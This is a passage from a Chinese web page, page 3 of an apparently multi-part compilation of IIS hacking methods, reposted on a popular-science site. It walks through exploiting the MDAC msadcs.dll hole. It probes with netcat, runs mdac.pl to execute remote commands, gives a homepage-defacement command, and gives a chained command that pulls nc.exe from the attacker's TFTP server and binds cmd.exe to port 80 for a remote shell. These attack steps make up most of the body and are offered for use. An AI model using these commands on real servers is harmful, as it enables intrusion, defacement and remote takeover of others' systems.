相关文章  
  • IIS控制管理(Web虚拟目录创建管理)
  • 如何在Win 2003中识别IIS 6.0组件
  • 服务器端异步 Web 方法(一)
  • 建立企业自己的Web网站
  • 用PWS建立自己的Web服务器
  • IIS服务器组建攻略
  • web 服务器环境的构建入门
  • 提高IIS网站服务器的效率的八种方法
  • 深入剖析Windows IIS 6.0(1)
  • 深入剖析Windows IIS 6.0(2)
  •   推荐  
      科普之友首页   专利     科普      动物      植物        天文   考古   前沿科技
     您现在的位置在:  首页 >>文献 >>培训

    有关IIS HACK的一些方法整理3

    操作:
      
      c:\>nc -nw -w 2 80
      GET /msadc/msadcs.dll HTTP
      
      如果你得到下面的信息:
      
      application/x_varg
      
      就很有可能没有打上补丁并存在此漏洞,你可以使用rain forest puppy站上的两个程序进行测试(www.wiretrip.net/rfp)==>mdac.pl和msadc2.pl 。
      
      c:\> mdac.pl -h
      Please type the NT commandline you want to run (cmd /c assumed):\n
      cmd /c
      
      OK,如果你要替换对方的主页,你就可以使用下面的方法:
      
      cmd/c echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm
      
      或者其他命令,当然最好的方法我觉得还是使用上载我们的netcat,并把CMD.EXE绑定到端口80上,我们可以设置我们自己的TFTP服务程序并把nc.exe放上去,然后在执行命令,如:
      
      cmd/c cd %systemroot%&&tftp -i GET nc.exe&&del ftptmp
      && attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
      
      然后你就连接到80口,得到一个SHELL口让你浏览。呵呵!
      
      
      ====

    页码:[1] [2] [3] [4] [5] [6] [7] [8]3页、共8页

         

          设为首页       |       加入收藏       |       广告服务       |       友情链接       |       版权申明      

    Copyriht 2007 - 2008 ©  科普之友 All right reserved